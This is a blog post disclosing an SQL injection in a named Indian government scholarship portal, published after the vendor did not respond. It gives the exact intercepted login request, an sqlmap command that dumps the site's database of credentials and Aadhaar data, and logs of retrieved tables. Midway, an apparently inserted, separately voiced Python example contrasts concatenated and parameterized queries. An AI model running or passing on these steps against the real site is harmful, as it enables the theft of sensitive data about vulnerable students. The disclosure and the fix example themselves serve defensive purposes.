Leaked Database of CGG Website: GOVT- BUG (CRITICAL)

Krishnadev P Melevila
2 min read · Dec 15, 2021

Hey guys, it's me again, Krishnadev P Melevila. For those who don't know me, as usual, search my full name on Google.

This time, it is a critical vulnerability in CGG (Centre for Good Governance).

What is CGG?

The Centre for Good Governance (CGG) was established in October 2001 by the then Government of Andhra Pradesh (GoAP), in collaboration with the Department for International Development (DFID) and the World Bank, to help it achieve the State's goal of Transforming Governance.

The vulnerable site is https://studycircle.cgg.gov.in/. This site is for students from backward communities to get scholarships and other benefits from the government.

IMPORTANT NOTE: This vulnerability was reported to both NCIIPC RVDP and CGG, but there has been no response from either end after 14 days. As a concerned citizen, and because highly sensitive data such as Aadhaar numbers, DOB, caste, phone numbers, usernames, passwords, etc. are leaking, I am compelled to publish this writeup here. I request you all to share this report until it reaches the hands of the authorities. I hereby declare that any unauthorized actions or misuse of this report will lead to severe consequences, and I will not be responsible for any issues arising from such actions.

Let's see the vulnerability:

Vulnerability: SQL INJECTION

Impact: CRITICAL

Risks: FULL DATABASE TAKEOVER

Priority: P1

Scope: EMPLOYEE ACCESS CONTROL, ADMIN ACCESS, COMPLETE DATA LEAK

STEPS TO REPRODUCE FROM THE ATTACKER'S POINT OF VIEW:

1. Visit https://studycircle.cgg.gov.in/tssw/Login.do, enter some dummy data in the username and password fields, and intercept the request in Burp Suite:

POST /tssw/Login.do HTTP/1.1
Host: studycircle.cgg.gov.in
Cookie: JSESSIONID=38B2CA258CAEE2C2D55B7C1E825A11B3; JSESSIONID=1095A3A1C02708449A3EAEF100FD4679
Content-Length: 77
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://studycircle.cgg.gov.in
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://studycircle.cgg.gov.in/tssw/Login.do
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close

signed=no&source=web&username=admin&password=b36ec36ee0e9be6b8b3ad80cc3e1023b

2. Here the username parameter is vulnerable to SQL injection. Save this request to a text file and run sqlmap against it with the command:

sqlmap -r tna.txt -p username -D public --dump

3. This dumps all the information in the public database, giving access to the complete site data, including login credentials.

Proof of vulnerability:

[20:23:32] [INFO] retrieved: ap_tw_groupi_iii_appl_17
[20:29:02] [INFO] retrieved: ap_upsc_prelims_2016
[20:33:11] [INFO] retrieved: apbc_bank_po_coaching_reg
[20:38:43] [INFO] retrieved: apbc_group1_coaching_institution
[20:45:36] [INFO] retrieved: apbc_group1_exam_centre_dist
[20:51:01] [INFO] retrieved: apbc_groupi_coaching_17_appl
[20:56:55] [INFO] retrieved: apsw_g1_g3_final_sl_17
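The root cause described above, as an added illustration that is not the site's own code: a login query built by concatenating the username field, beside the parameterized form that the application should have used. The in-memory SQLite table, the row and the hash value are constructed stand-ins, not data from the real system.

```python
import sqlite3

# Constructed in-memory database standing in for the application's users table.
# The row and its hash value are made up for this example.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin', 'constructed-hash-of-admin-password')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str):
    """Flawed pattern: request fields are pasted into the SQL text.

    A quote in the username closes the string literal, so the rest of the
    WHERE clause (including the password check) becomes attacker-controlled.
    This is the bug class behind the injectable 'username' parameter above.
    """
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str):
    """Fixed pattern: bound parameters keep input as data, never as SQL.

    The driver sends the query shape and the values separately, so quotes or
    comment markers inside the username are matched literally against the
    column and cannot change the statement.
    """
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    row = conn.execute(sql, (username, password_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    good = "constructed-hash-of-admin-password"
    print("legit, vulnerable:", login_vulnerable(db, "admin", good))   # admin
    print("legit, safe:      ", login_safe(db, "admin", good))         # admin
    # A username that ends the literal and comments out the password check
    # authenticates against the concatenated query but not the bound one.
    print("probe, vulnerable:", login_vulnerable(db, "admin'--", "x"))  # admin
    print("probe, safe:      ", login_safe(db, "admin'--", "x"))        # None
```

The same fix applies to a Java web application such as this one: a PreparedStatement with `?` placeholders instead of string concatenation into the query.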

Don't forget to follow me on Medium and other social media.

My Instagram handle: https://instagram.com/krishnadev_p_melevila

My Twitter handle: https://twitter.com/Krishnadev_P_M

My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/

My personal website: http://krishnadevpmelevila.com/

Krishnadev P Melevila

Web Application Penetration Tester | Cyber Security Enthusiast | Secured Mahatma Gandhi University, Entri App, Linways, Kerala Public Service Commission & More